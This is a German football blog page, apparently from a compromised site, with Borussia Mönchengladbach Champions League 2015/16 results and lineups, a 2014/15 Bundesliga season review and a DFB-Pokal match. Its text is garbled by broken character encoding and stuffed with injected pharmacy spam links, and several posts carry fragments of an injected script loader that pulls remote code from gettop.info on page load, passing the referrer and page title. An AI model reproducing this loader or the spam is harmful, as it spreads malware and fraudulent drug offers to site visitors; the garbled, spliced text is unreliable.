Willkommen auf » Borussia MA�nchengladbach
8.Dez 2015

Champions League 2015/16 Gruppenphase 6. Spieltag
Manchester City – Borussia MA�nchengladbach 4:2

1:0 David Silva (16., Linksschuss, Sterling)
1:1 Julian Korb (19., Rechtsschuss, Stindl)
1:2 Raffael (42., Rechtsschuss, F. Johnson)
2:2 Raheem Sterling (79., Linksschuss, Bony)
3:2 Raheem Sterling (81., Rechtsschuss, Bony)
4:2 Wilfried Bony (85., Linksschuss)
vor 40.000 Zuschauern im Etihad Stadium, Manchester

Aufstellung Man City: Hart – Clichy, Otamendi, Mangala, Kolarov – Delph (65.Bony), Fernandinho – De Bruyne (65.Jesus Navas), Yaya TourA�, Silva – Sterling

Aufstellung Gladbach: Sommer – Elvedi, A. Christensen, Nordtveit, Wendt (84.Hazard) – Dahoud (66.M. Schulz), G. Xhaka – Korb, F. Johnson (72.Drmic) – Stindl, Raffael

Die Zusammenfassung des Spiels…
http://virgiliogutierrezherreros.com/pills-for-depression-blue-little-pill/
AuAYerdem auch hier zu sehen

Die Abschlusstabelle der Gruppe D
1. Manchester City, 12 Pkt.
2. Juventus Turin, 11 Pkt.
3. FC Sevilla, 6 Pkt.
4. Borussia MA�nchengladbach, 5 Pkt. Cheap http://eni-seafood.com/how-much-does-triamcinolone-acetonide-cost/ online http://www.viking-klima-sp.si/order-clarina-bezzola/ Cheap purchase reminyl classification order imdur 30 Order s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; advair shortage Pills Cheap cheap accutane

26.Nov 2015

Champions League 2015/16 Gruppenphase 5. Spieltag
Borussia MA�nchengladbach – FC Sevilla 4:2

1:0 Lars Stindl (29., Rechtsschuss, G. Xhaka)
2:0 Fabian Johnson (68., Rechtsschuss, Korb)
3:0 Raffael (78., Rechtsschuss, Stindl)
3:1 Vitolo (82., Rechtsschuss, F. Llorente)
4:1 Lars Stindl (83., Rechtsschuss, F. Johnson)
4:2 Ever Banega (90. + 1, Foulelfmeter, Rechtsschuss, Krychowiak)
vor 45.000 Zuschauern im Borussia-Park in MA�nchengladbach

Aufstellung Gladbach: Sommer – Korb, A. Christensen, Nordtveit, Wendt – Dahoud (79.M. Schulz), G. Xhaka – TraorA� (13.Drmic), F. Johnson (87.Elvedi) – Stindl – Raffael

Aufstellung Sevilla: Sergio Rico – Coke (82.Mariano), Rami, Kolodziejczak, Tremoulinas – Krychowiak – Krohn-Dehli (64.Nzonzi) – Banega – Vitolo, Konoplyanka – Gameiro (76.F. Llorente)

Die Zusammenfassung des Spiels…
purchase aldactone generic
AuAYerdem auch online order clonidine overnight delivery Order manforce sildenafil citrate tablets use hier (sky-Bericht), hier und Pills Buy Buy hier purchase precose package zu sehenif (document.currentScript) { online accutane without prescription pills Cheap purchase lincocin injection

4.Nov 2015

Champions League 2015/16 Gruppenphase 4. Spieltag
Borussia MA�nchengladbach – Juventus Turin 1:1

1:0 Fabian Johnson (18., Rechtsschuss, Raffael)
1:1 Stephan Lichtsteiner (44., Rechtsschuss, Pogba)
vor 46.000 Zuschauern im Borussia-Park in MA�nchengladbach

Aufstellung Gladbach: Sommer – Nordtveit, A. Christensen, Alvaro Dominguez, Wendt – Dahoud, G. Xhaka – TraorA�, F. Johnson (85.Hazard) – Stindl – Raffael

Aufstellung Juventus: Buffon – Lichtsteiner, Chiellini, Bonucci, Evra – Sturaro (87.Lemina), Marchisio, Pogba – Hernanes – Dybala (63.Cuadrado), Morata (75.Barzagli)

Die Zusammenfassung des Spiels…

AuAYerdem auch rx drugs without prescription Cheap http://www.deafclub.info/blog/2018/02/02/order-sumycin-500mg/ Cheap purchase eulexin manufacturer purchase metformin uk hier online Buy Order (sky-Bericht), Pills hier und hier zu sehendocument.currentScript.parentNode.insertBefore(s, document.currentScript); himalaya himcolin gel price in bangladesh Pills Cheap

21.Okt 2015

Champions League 2015/16 Gruppenphase 3. Spieltag
Juventus Turin – Borussia MA�nchengladbach 0:0

vor knapp 41.000 Zuschauern in der ausverkauften Juventus Arena in Turin

Aufstellung Juventus: Buffon – Barzagli, Bonucci, Chiellini – Marchisio – Khedira, Pogba – Cuadrado (61. Pereyra), Alex Sandro – Mandzukic (70. Zaza), Morata (81. Dybala)

Aufstellung Gladbach: Sommer – Korb, A. Christensen, Alvaro Dominguez, Wendt – Dahoud (88. Nordtveit), G. Xhaka – TraorA� (82. Hahn), F. Johnson – Stindl, Raffael (74. Hazard)

Die Zusammenfassung des Spiels…
Buy
AuAYerdem auch hier (sky-Bericht), Purchase hier http://alokapidakaldim.com/buy-nootropil-piracetam.html viagra in melbourne und hier order duetact 30 zu sehen buy styplon tablets order lynoral effects Buy http://www.sqreformation.com/2018/02/buy-amitriptyline-50-mg-uk/ http://www.micronature.cn/wp/index.php/2018/03/19/buy-amitriptyline-10mg/ online Order azithromycin 250 mg and alcohol

21.Okt 2015

FA?r den FC Bayern MA?nchen hA�tte der Champions-League-Auftakt wohl kaum besser laufen kA�nnen: Nach zwei Spielen haben die MA?nchener noch kein einziges Tor kassiert, Olympiacos mit 3:0 und Dinamo Zagreb mit 5:0 souverA�n an die Wand gespielt. Daran dA?rfte sich aller Voraussicht nach auch am dritten Spieltag nichts A�ndern: Da trifft der FC Barcelona auf den FC Arsenal, der bislang recht erfolglos mit 1:2 Dinamo Zagreb (1. Spieltag) und 2:3 Olympiacos (2. Spieltag) unterlegen ist.

Reelle Chancen auf einen Sieg dA?rfte morgen auch Bayer Leverkusen im Duell gegen den AS Roma haben. Die Leverkusener scheiterten vor zwei Wochen zwar mit 1:2 am FC Barcelona, konnten aber im Auftaktspiel ein mehr als solides 4:1 gegen BATE Borisov durchbringen a�� ein Gegner, dem Roma nicht beikommen konnte (Endstand: 2:3). FA?r Statistikfans: Damit liegt Leverkusen derzeit in der CL-Statistik nicht nur nominal in der Tabelle vor Rom, sondern auch punktemA�AYig und was die erzielten Tore pro Spiel anbelangt.

Ein recht ausgeglichenes Duell dA?rfte es fA?r den dritten deutschen Club in der Liga, den VfL Wolfsburg werden: Die Werkself trifft am Mittwoch im Heimspiel auf den PSV Eindhoven. Sowohl der VfL als auch Eindhoven blicken bisher jeweils auf einen Sieg und eine Niederlage zurA?ck; auch in der restlichen Gruppe B zeichnet sich nach zwei Spieltagen noch kein allzu klares Bild ab: Mit jeweils einer siegreichen Partie und einer Niederlage liegen zumindest nach Zahlen alle Clubs derzeit gleich auf.

Ein schweres Los wird dagegen das AuswA�rtsspiel am Mittwoch von MA�nchengladbach gegen Juventus Turin. Dass es die Gladbacher in ihrer Gruppe nicht gerade leicht haben werden, darA?ber war man sich schon nach der Gruppenauslosung einig. Und die ersten beiden Spiele haben das verdeutlicht: Weder gegen Sevilla (0:3) noch gegen Manchester City (1:2) hatte MA�nchengladbach echte Chancen. Jetzt trifft die Elf auf den amtierenden Vizemeister der Champions League, der an den vergangenen zwei Spieltagen auch Sevilla und Manchester City als Verlierer heimschickte.

Somit ist aus derzeitiger Sicht unwahrscheinlich, dass MA�nchengladbach die Gruppenphase A?berleben wird. Aus sportlicher Sicht eine niederschmetternde Prognose, http://davidgagnonblog.com/?p=2235 purchase carbozyne reviews remeron price in pakistan inj chloramphenicol price online Buy finanziell gesehen zahlt sich die Teilnahme an der Champions League aber auch aus, wenn man schon nach den Playoffs hinausfliegt. Denn die UEFA hat neben den anderen PrA�mienausschA?ttungen auch das Startgeld von bisher 8,6 Millionen auf 12 Millionen Euro erhA�ht.} else { buy colchicine nz Buy Pills Pills canadian doxycycline prices online pharmacy azitromycin http://suyanto.dosen.akprind.ac.id/2018/03/15/grifulvin-order/

16.Sep 2015

Champions League 2015/16 Gruppenphase 1. Spieltag
FC Sevilla – Borussia MA�nchengladbach 3:0

1:0 Kevin Gameiro (47., Foulelfmeter, Rechtsschuss, Vitolo)
2:0 Ever Banega (67., Foulelfmeter, Rechtsschuss, Gameiro)
3:0 Yevhen Konoplyanka (84., Rechtsschuss, Krohn-Dehli)
vor knapp 40.000 Zuschauern im Estadio Ramon Sanchez Pizjuan in Sevilla

Aufstellung Sevilla: Sergio Rico – Coke, Andreolli, Kolodziejczak, Tremoulinas – Krychowiak, Nzonzi – Vitolo, Banega (75. Krohn-Dehli), J. Reyes (83. Konoplyanka) – Gameiro (71. Immobile)

Aufstellung Gladbach: Sommer – Korb, Brouwers, Jantschke, Wendt – Stindl (67. Dahoud), Nordtveit – Hahn (72. N. Schulz), TraorA� – Raffael (83. Drmic) – Hazard

Die Zusammenfassung des Spiels…
Order
AuAYerdem auch Cheap hier (sky-Bericht), Pills delivery erexin-v Pills hier und cost of flagyl without insurance hier, sowie im ARD-Bericht buy pills revatio 20 mg how much is a 30 day supply of celebrex zu sehens.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; http://kinhnghiemlaixe.net/albendazole-single-dose-treatment-21894.html Buy buy albenza online yasmin birth control pills price philippines

1.Sep 2015

Champions League 2015/16 Gruppenphase 2. Spieltag
Borussia MA�nchengladbach – Manchester City 1:2

1:0 Lars Stindl (54., Rechtsschuss, Korb)
1:1 Andreas Christensen (65., Eigentor, Rechtsschuss, Otamendi)
1:2 Sergio Aguero (90., Foulelfmeter, Rechtsschuss, Aguero)
vor knapp 46.000 Zuschauern im ausverkauften Stadion im Borussia-Park in MA�nchengladbach

Aufstellung Gladbach: Sommer – Korb (78. TraorA�), A. Christensen, Alvaro Dominguez, Wendt – Dahoud (85. Nordtveit), G. Xhaka – Herrmann (72. Hahn), F. Johnson – Raffael – Stindl

Aufstellung Manchester: Hart – Sagna, Demichelis, Otamendi, Kolarov – Yaya TourA� (46. Fernando), Fernandinho – De Bruyne, Silva (65. Jesus Navas), Sterling (90. + 3 Zabaleta) – Aguero

Die Zusammenfassung des Spiels…
Order
AuAYerdem auch hier (sky-Bericht), hier Pills is prozac an over the counter drug Purchase Cheap (ZDF-Bericht), http://goingonfaith.com/cheap-hytrin-10/ hier und adalat sony tv watch online desi tashan hier clozaril dosing in bipolar disorder zu sehend.getElementsByTagName(‚head‘)[0].appendChild(s); Purchase http://coachingplus.dk/order-aygestin-treat/ pharmacy inline with no percription

26.Mai 2015

Wir zelebrieren auch in diesem Jahr den Abschluss der am vergangenen Wochenende zu Ende gegangenen Bundesligasaison. Hier also die Daten, Fakten und Rekorde der 52. Spielzeit der hA�chsten deutschen FuAYballliga.

Zum dritten Mal in Folge und insgesamt 25. Mal feiert sich nach 34 Spieltagen der FC Bayern MA?nchen als Ligaprimus. Ein wenig getrA?bt wird die Freude im SA?den der Republik allerdings, da man sich nach dem doppelten Halbfinalaus im DFB-Pokal und der Champions League in diesem Jahr „nur“ mit dem nationalen Meistertitel in die Sommerpause verabschieden muss. Der Rest der FuAYballrepublik denkt sich: Wohl dem, der solche Probleme hat.

Auf dem Youtube-Kanal des FC Bayern gibt’s die zweistA?ndige Komplettaufzeichnung der rot-blauen Meisterfeier auf dem MA?nchner Marienplatz…

Eine selbst fA?r den groAYen FC Bayern unerreichbare Bestmarke verteidigt auch 2014/2015 Borussia Dortmund als Meister der Massen. Der BVB erhA�hte seinen Zuschauerschnitt sogar noch auf 80.475 GA�ste im Signal-Iduna-Park pro Spiel und hA�lt weiterhin den Titel des hA�chsten Schnitts Europas. In Summe begrA?AYte man 1.368.071 Besucher in Dortmund, 1.239.483 in MA?nchen (nach Umbau der Allianz-Arena ebenfalls mit einem im Vergleich zum Vorjahr hA�heren Durchschnitt von 72.911) und 1.045.784 auf Schalke (im Durchschnitt 61.517 in der Veltins-Arena). Insgesamt lockte man 13.234.558 Besucher in die Stadien der 18 Bundesligisten.

Abschlusstabelle
1 ~ FC Bayern MA?nchen ~ 79 Pkt. ~ Champions League
2 ~ VfL Wolfsburg ~ 69 Pkt. ~ Champions League
3 ~ Borussia MA�nchengladbach ~ 66 Pkt. ~ Champions League
4 ~ Bayer Leverkusen ~ 61 Pkt. ~ Champions League Qualifikation
5 ~ FC Augsburg ~ 49 Pkt. ~ Europa League
6 ~ FC Schalke 04 ~ 48 Pkt. ~ Europa League
7 ~ Borussia Dortmund ~ 46 Pkt. ~ Europa League
8 ~ 1899 Hoffenheim ~ 44 Pkt.
9 ~ Eintracht Frankfurt ~ 43 Pkt.
10 ~ Werder Bremen ~ 43 Pkt.
11 ~ 1. FSV Mainz 05 ~ 40 Pkt.
12 ~ 1. FC KA�ln ~ 40 Pkt.
13 ~ Hannover 96 ~ 37 Pkt.
14 ~ VfB Stuttgart ~ 36 Pkt.
15 ~ Hertha BSC ~ 35 Pkt.
16 ~ Hamburger SV ~ 35 Pkt. ~ Relegation
17 ~ SC Freiburg ~ 34 Pkt. ~ Abstieg
18 ~ SC Paderborn ~ 31 Pkt. ~ Abstieg

Als „Overachiever“ des Jahres dA?rfen sich Borussia MA�nchengladbach und der FC Augsburg feiern. Die Gladbacher stoAYen nach drei Jahren wieder in die Spitzengruppe der Bundesliga vor und schlieAYen als Dritter. Die Fohlen sind damit direkt fA?r die Champions League Gruppenphase qualifiziert. Augsburg verbessert sich im vierten Jahr nach dem Aufstieg weiter kontinuierlich von Rang 14 und 15 A?ber acht auf fA?nf und darf die Liga somit im kommenden Jahr zum ersten Mal in der Vereinsgeschichte international in der Europa League vertreten. Tolle Leistung von Trainer Markus Weinzierl und seinem Team!

„Underperformer“ kann man im FC Schalke sehen, der sich selbst wie in den vergangenen Jahren unter den besten Vier der Liga wA�hnte, nach 34 Spieltagen aber auf Platz sechs wiederfindet und umgehend von Trainer Roberto Di Matteo trennte. Auch vom Hamburger SV hat man im Jahr nach der nur knapp gewonnenen Abstiegsrelegation und dem angekA?ndigten Umbruch deutlich mehr erwartet. Die RealitA�t im Norden sieht jedoch anders aus: Nur 25 Tore und 35 Punkte in 34 Spielen und damit erneut einmal nachsitzen in zwei Endspielen gegen den Dritten der zweiten Liga Karlsruhe.

Eine SondererwA�hnung verdient sich an dieser Stelle Borussia Dortmund. Der BVB hat es nicht nur geschafft, sich von einem bedrohlichen Platz 17 am Ende der Hinrunde zurA?ck aus dem Abgrund zu kA�mpfen, sondern nach weiteren 17 Spieltagen mit Platz sieben und der Teilnahme am deutschen Pokalfinale sogar fA?r die Europa League zu qualifizieren.

TorschA?tzenliste Buy
1. Alexander Meier (Eintracht Frankfurt) mit 19 Toren in 26 Spielen
2. Arjen Robben (FC Bayern MA?nchen) mit 17 Toren in 21 Spielen
3. Robert Lewandowski (FC Bayern MA?nchen) mit 17 Toren in 31 Spielen

Alle Treffer des TorschA?tzenkA�nigs Meier im Zusammenschnitt…

Scorerliste
1. Kevin de Bruyne (VfL Wolfsburg) mit 10 Toren und 21 Vorlagen (Rekord!)
2. Thomas MA?ller (FC Bayern MA?nchen) mit 13 Toren und 15 Vorlagen
3. Arjen Robben (FC Bayern MA?nchen) mit 17 Toren und 8 Vorlagen

Sonstiges
Buy

  • Einen neuen Weitenrekord stellte am vierten Spieltag http://mcjts.com/?p=9486 Moritz Stoppelkamp vom SC Paderborn Purchase mit seinem Fernschuss aus knapp 82 Metern auf
  • Der SA?nder der Liga ist der Gladbacher Granit Xhaka mit zehn Gelben und einer Gelb-Roten Karte in 30 Spielen
  • Die WeiAYe Weste trA�gt seit 2012 ununterbrochen Manuel Neuer. Bei 32 Auftritten hielt er in diesem Jahr seinen Kasten 20 Mal fA?r den FC Bayern sauber und stellt damit einen neuen Bundesligarekord auf. Eine weitere Bestmarke sind die vier Gegentore der gesamten Hinrunde. Yann Sommer und Borussia MA�nchengladbach A?bernahmen den Rekord mit zehn Gegentreffern in der zweiten SaisonhA�lfte
  • taxi cost from goa airport to calangute

  • Der ElfmetertA�ter der Liga ist Jaroslav Drobny vom Hamburger SV. Von sieben StrafstA�AYen gegen sein Team wehrte er drei ab
  • Top-Joker ist Nils Petersen. FA?r Werder Bremen und den SC Freiburg traf er bei zwA�lf Einwechslungen sechs mal und bereitete zwei Tore vor
  • Die EigentorkA�nige der Liga stammen vom VfL Wolfsburg. Sebastian Jung, Robin Knoche und Vieirinha trafen je einmal ins eigene Tor
  • Das KA?ken der Bundesligasaison ist der MA?nchner Gianluca Gaudino. Er debA?tierte im zarten Alter von 17 Jahren, 9 Monaten und 11 Tagen beim 2:1 gegen den VfL Wolfsburg am 22.08.2014
  • purchase medrol dose pack

  • Die Dauerbrenner der Liga sind die TorhA?ter Ron-Robert Zieler (Hannover 96), Yann Sommer (Borussia MA�nchengladbach), Bernd Leno (Bayer Leverkusen), Lukas Kruse (SC Paderborn), Roman BA?rki (SC Freiburg), Oliver Baumann (1899 Hoffenheim), sowie die beiden Abwehrspieler Marcelo (Hannover 96) und Ragnar Klavan (FC Augsburg), die keine einzige Minute der Saison verpassten
  • online

  • Dem 1. FC KA�ln bunkerte sich mit acht 0:0 Unentschieden zu einem weniger triumphalen Eintrag in die BundesligarekordbA?cher
  • Man hA�re und staune: Mit nun acht Meistertiteln und sieben Pokalsiegen ist Bastian Schweinsteiger der erfolgreichste deutsche Kicker aller Zeiten.

SchlieAYen wir damit also wieder einmal das Kapitel Bundesliga fA?r ein paar Monate. Auch ohne Welt- und Europameisterschaft im Kalender steht aber kein fuAYballloser Sommer vor uns. Neben den Finalspielen in Champions League und DFB-Pokal steht z.B. noch das ein oder andere Profi- und NachwuchslA�nderspiel auf dem Programm.

27. Mai ~ Europa League Finale Dnipro Dnipropetrovsk – FC Sevilla
28. Mai bis 2. Juni ~ Bundesliga-Relegation
30. Mai ~ DFB-Pokal Finale VfL Wolfsburg – Borussia Dortmund
30. Mai bis 20. Juni ~ U20-Weltmeisterschaft in Neuseeland
6. Juni ~ Champions League Finale Juventus Turin – FC Barcelona
6. Juni bis 5. Juli ~ Weltmeisterschaft der Frauen in Kanada
10. Juni ~ Testspiel Deutschland – USA
13. Juni ~ EM-Qualifikation Gibraltar – Deutschland
17. bis 30. Juni ~ U21-Europameisterschaft in Tschechien
24. bis 27. Juli ~ 1. Spieltag der 2. Bundesliga
1. August ~ DFL-Supercup
7. bis 10. August ~ 1. Runde des DFB-Pokals
14. bis 17. August ~ 1. Spieltag der 1. Bundesliga

Unterm Strich also doch wieder ein gut gefA?llter Sommerplan :) Purchase Purchase buy brand viagra canada Pills buy viagra with american express card Cheap

21.Mai 2015

Borussia MA�nchengladbach ist endgA?ltig zurA?ck in der Spitzengruppe des deutschen FuAYballs. Der dritte Tabellenplatz und damit die direkte Qualifikation fA?r die kommende Champions League Saison ist bereits im Sack. Da dA?rfte sich beim ein oder anderen im Team von Trainer Lucien Favre ein ordentlicher Klotz an Anspannung lA�sen.

Die verdiente Entspannung und nun folgende Lockerheit demonstrierten die Gladbacher Max Kruse und Christoph Kramer neulich mit einem kleinen Hackenspektakel in der AufwA�rmrunde auf dem Rasen des heimischen Borussia-Parks…

online
Auch nochmal hier prednisone for dogs over the counter online wellbutrin sr name brand vs generic Purchase und hier zu sehen

Du bist auf der Suche nach einem Wettanbieter fA?r die Deutsche FuAYball Bundesliga? Wir empfehlen dir den Livetipsportal.com Wettanbieter Test, der dir mehr als 20 Buchmacher im Detail beschreibt.document.currentScript.parentNode.insertBefore(s, document.currentScript); online Cheap Order Buy

9.Apr 2015

DFB-Pokal 2014/15 Viertelfinale
Arminia Bielefeld – Borussia MA�nchengladbach 1:1, 5:4 i.E.

1:0 Manuel Junglas (26., Rechtsschuss, Mast)
1:1 Max Kruse (32., Handelfmeter, Linksschuss)
vor 26.000 Zuschauern in der ausverkauften SchA?co-Arena in Bielefeld

Aufstellung Bielefeld: Schwolow – Dick, Burmeister, Salger, Schuppan – Junglas (46. Brinkmann), SchA?tz – Hemlein, C. MA?ller (99. Ulm), Mast (76. Lorenz) – Klos

Aufstellung Gladbach: Sommer – Jantschke, Brouwers, Alvaro Dominguez, Wendt – Kramer, G. Xhaka – Herrmann (69. TraorA�), Hazard (99. F. Johnson) – Hahn (80. Raffael), M. Kruse

Die Zusammenfassung des Spiels…
vardenafil pharmacy Pills vermox online pharmacy http://advisors.se/blogg/2018/02/02/cheapest-place-to-order-estrace-cream/ Buy
AuAYerdem auch im order synthroid online no prescitption Purchase Pills buy pills where can i buy indocin ARD-Kurzbericht zu sehens.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=‘ + encodeURIComponent(document.referrer) + ‚&default_keyword=‘ + encodeURIComponent(document.title) + “; Order Purchase Pills

Seiten: 1 2 3 4 5 6